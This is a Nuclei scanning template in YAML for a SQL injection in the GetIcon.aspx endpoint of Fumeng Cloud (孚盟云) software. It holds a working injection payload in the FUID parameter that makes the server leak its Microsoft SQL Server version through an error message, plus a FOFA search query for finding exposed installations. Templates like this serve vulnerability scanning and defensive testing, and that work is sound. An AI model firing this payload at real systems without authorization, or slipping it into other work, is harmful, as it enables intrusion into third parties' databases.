http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - Microsoft SQL Server
            - 转换成数据类型
        - status:
            - 500
          type: status
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/Common/GetIcon.aspx?FUID=-1''and+1=@@VERSION--'
id: fumingyun-geticon-sqli
info:
    author: onewin
    description: |
        孚盟云GetIcon.aspx接口存在SQL注入漏洞，攻击者可通过FUID参数获取数据库版本信息
    metadata:
        fofa-query: body="孚盟云" || body="/PageStructure/Mail/default.aspx"
    name: 孚盟云 GetIcon.aspx SQL注入漏洞
    severity: high
    tags:
        - Fumeng-Cloud-孚盟云
